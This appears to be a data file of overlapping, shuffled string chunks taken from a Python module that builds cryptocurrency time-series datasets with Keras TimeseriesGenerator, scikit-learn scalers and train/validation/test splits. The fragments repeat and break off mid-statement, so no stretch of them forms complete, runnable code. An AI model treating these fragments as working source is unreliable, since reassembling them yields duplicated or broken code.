"* self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :]",
"seaborn as sns import tensorflow as tf from dataclasses import dataclass from analyze.dataload",
"self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)",
"shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size)",
"targets return samples, targets @dataclass class DataSet: def __init__(self): self.name: str = ''",
"self.input_shape = None pass def get_train(self): if (self.x_Train is not None) and (self.y_Train",
"self.test_gen = None self.input_shape = None pass def get_train(self): if (self.x_Train is not",
"self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self)",
"> self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part of",
"pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to load time_intervals =",
"length is {}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if overlap >=",
"None self.val_gen = None self.test_gen = None self.input_shape = None pass def get_train(self):",
"= length self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index + length",
"start_period = None -> Use from [0:] of historical data start_period = '2021-09-01",
"from typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from",
"self.dataset_profile = DSProfile() self.features_df = None self.y_df = None self.x_Train = None self.y_Train",
"'is disallowed, as no part of the sequence ' 'would be left to",
"self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows",
"in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in rows])",
"= None self.y_Train = None self.x_Val = None self.y_Val = None self.x_Test =",
"self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if",
"type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr)",
"gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\":",
"in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape",
"= self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def",
"targets = np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:, ::-1, ...],",
"y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time",
"/ 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return",
"self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler",
"self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation",
"def get_train(self): if (self.x_Train is not None) and (self.y_Train is not None): return",
"preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr,",
"(with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this list to load",
"['15m'] -> Use timeframes from this list to load start_period = None ->",
"is not None) and (self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self):",
":] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data =",
"DataLoad class ------------------------ pairs_symbol = None -> Use all pairs in timeframe directory",
"data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets,",
"self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\":",
"if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self,",
"None self.test_gen = None self.input_shape = None pass def get_train(self): if (self.x_Train is",
"return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride,",
"targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen:",
"\"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr",
"\"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight =",
"= (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint(",
"if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no",
"rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index +",
"= DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0]",
"import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as",
"dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with",
"end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data, dataset_1_profile) dataset_1_cls = dsc.create_dataset()",
"of the sequence ' 'would be left to be used as current step.'",
"Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler",
"- test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len +",
"+ self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes,",
"y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler",
"row in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in",
"class ------------------------ pairs_symbol = None -> Use all pairs in timeframe directory pairs_symbol",
"time.daylight: offset_hour = time.altzone / 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg",
"self.reverse: return samples[:, ::-1, ...], targets return samples, targets @dataclass class DataSet: def",
"x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data",
"self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None",
"\"\"\" Getting object with OHLCV data (symbols and timeframes). All data with chosen",
"x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset",
"self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return",
"def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows",
"(self.x_Test is not None) and (self.y_Test is not None): return self.x_Test, self.y_Test class",
"self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error: Unknown dataset preparation",
"self.y_Train = None self.x_Val = None self.y_Val = None self.x_Test = None self.y_Test",
"directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile",
"y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len +",
"type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\":",
"self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr",
"as np import datetime import pandas as pd from typing import Tuple from",
"+ self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :]",
"as tf from dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import",
"test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have",
"stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index,",
"create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if",
"= int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df =",
"self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data,",
"to be used as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass",
"create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg",
":] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :]",
"+ val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :]",
"Args: loader (DataLoad): object with data Returns: DSCreator (class): object \"\"\" self.features =",
"self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len =",
"generator 1 time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data)",
"sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing",
"for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],)",
"\"\"\" Class for dataset creation for dataset configuration we are using DSConstants dataclass",
"self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power()",
"= object self.targets_scaler = object self.train_gen = None self.val_gen = None self.test_gen =",
"return sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index +",
"== \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight",
"to load start_period = None -> Use from [0:] of historical data start_period",
"end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse,",
"self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else:",
"import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import",
"__init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df = None self.y_df =",
"used as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self):",
"self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data,",
"y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler =",
"* index) rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1),",
"index = 0 i = (self.start_index + self.batch_size * self.stride * index) rows",
") return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate,",
"\"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df =",
"= \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1,",
"sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing",
":] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data",
"- 1 self.end_index = end_index self.shuffle = shuffle self.reverse = reverse self.batch_size =",
"!= len(targets): raise ValueError('Data and targets have to be' + ' of same",
"TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data,",
"= np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if",
"= reverse self.batch_size = batch_size self.sample_shape = None if self.start_index > self.end_index: raise",
":] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data =",
"from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from",
"(self.x_Train is not None) and (self.y_Train is not None): return self.x_Train, self.y_Train def",
"/ 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour",
"\"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler",
"= None self.y_df = None self.x_Train = None self.y_Train = None self.x_Val =",
"preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr,",
"time_intervals = None -> Use all timeframes directories for loading (with pairs_symbols) time_intervals",
"length={length}` is disallowed') if overlap > 0: start_index += overlap self.data = data",
"to load time_intervals = None -> Use all timeframes directories for loading (with",
"self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset creation for dataset configuration we",
"self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape = None if",
"from [0:] of historical data start_period = '2021-09-01 00:00:00' -> Use from this",
"length self.overlap = overlap if end_index is None: end_index = len(data) - 1",
"(samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index,",
"-> Use this directory to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'],",
"= sampling_rate self.stride = stride self.start_index = start_index + length self.overlap = overlap",
"current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index =",
"return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset creation for dataset configuration",
"self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data",
"\"\"\" Usage for DataLoad class ------------------------ pairs_symbol = None -> Use all pairs",
"end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and targets have",
"self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) #",
"= DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df",
":] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data =",
"= None -> Use all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\")",
"# self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in rows]) if self.reverse:",
"' 'would be left to be used as current step.' % (self.start_index, self.end_index))",
"= self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df",
"= None -> Use from [0:] of historical data start_period = '2021-09-01 00:00:00'",
"DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data ==",
"dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__",
"23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" -> Use this directory to search",
":] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes",
"None) and (self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test",
"+ self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:,",
"\"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1)",
"\"\"\" Using generator 1 time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test =",
"copy import pytz import numpy as np import datetime import pandas as pd",
"start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler =",
"x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len",
"Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if",
"------------------------ pairs_symbol = None -> Use all pairs in timeframe directory pairs_symbol =",
"sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen =",
"y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0]",
"until [:-1] of historical data end_period = '2021-12-05 23:59:59' -> Use until this",
"= RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error: Unknown scaler preparation type\"",
"df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df",
"the sequence ' 'would be left to be used as current step.' %",
"df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size",
"targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler",
"self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape",
"sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows =",
"pairs to load time_intervals = None -> Use all timeframes directories for loading",
"+ self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen =",
"\"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler",
"= stride self.start_index = start_index + length self.overlap = overlap if end_index is",
"reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if",
") return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate,",
"import pandas as pd from typing import Tuple from sklearn.preprocessing import StandardScaler from",
"= self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data)",
"from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import",
"self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if",
"from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from",
"self.reverse = reverse self.batch_size = batch_size self.sample_shape = None if self.start_index > self.end_index:",
"\"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr,",
"import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import",
"samples.shape targets = np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:, ::-1,",
"import datetime import pandas as pd from typing import Tuple from sklearn.preprocessing import",
"= '' self.dataset_profile = DSProfile() self.features_df = None self.y_df = None self.x_Train =",
"def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}'",
"DSProfile): \"\"\" Getting object with OHLCV data (symbols and timeframes). All data with",
"def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size)",
"for row in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for row",
"self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None",
"sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1,",
"all timeframes directories for loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes",
"end_index self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape = None",
"+ self.batch_size * self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap",
"stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return x_data,",
"be' + ' of same length. ' 'Data length is {}'.format(len(data)) + '",
"\"\"\" Using generator 1 time to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data,",
"this datetimeindex source_directory=\"../source_root\" -> Use this directory to search timeframes directory \"\"\" loaded_crypto_data",
"= '2021-09-01 00:00:00' -> Use from this datetimeindex end_period = None -> Use",
"Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset =",
"sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing",
"df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data,",
"size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride * index) rows =",
"DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight:",
"Using generator 1 time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data,",
"sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data",
"+ self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size)",
"else: offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0:",
"with chosen period loaded to memory Args: loader (DataLoad): object with data Returns:",
"def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else:",
"return self.dataset else: msg = \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name =",
"= None -> Use until [:-1] of historical data end_period = '2021-12-05 23:59:59'",
"pass def calc_shape(self): index = 0 i = (self.start_index + self.batch_size * self.stride",
"-> Use from this datetimeindex end_period = None -> Use until [:-1] of",
"batch_size) if len(data) != len(targets): raise ValueError('Data and targets have to be' +",
"loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile()",
"-> Use from [0:] of historical data start_period = '2021-09-01 00:00:00' -> Use",
"self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df =",
"end_index is None: end_index = len(data) - 1 self.end_index = end_index self.shuffle =",
"np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:, ::-1, ...], targets return",
"pass if __name__ == \"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol =",
"pass def get_train(self): if (self.x_Train is not None) and (self.y_Train is not None):",
"source_directory=\"../source_root\" -> Use this directory to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None,",
"and targets have to be' + ' of same length. ' 'Data length",
"+ length self.overlap = overlap if end_index is None: end_index = len(data) -",
"for dataset creation for dataset configuration we are using DSConstants dataclass (profile) \"\"\"",
"self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error:",
"= self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler =",
"y_data in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__",
"(df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes:",
"= object self.train_gen = None self.val_gen = None self.test_gen = None self.input_shape =",
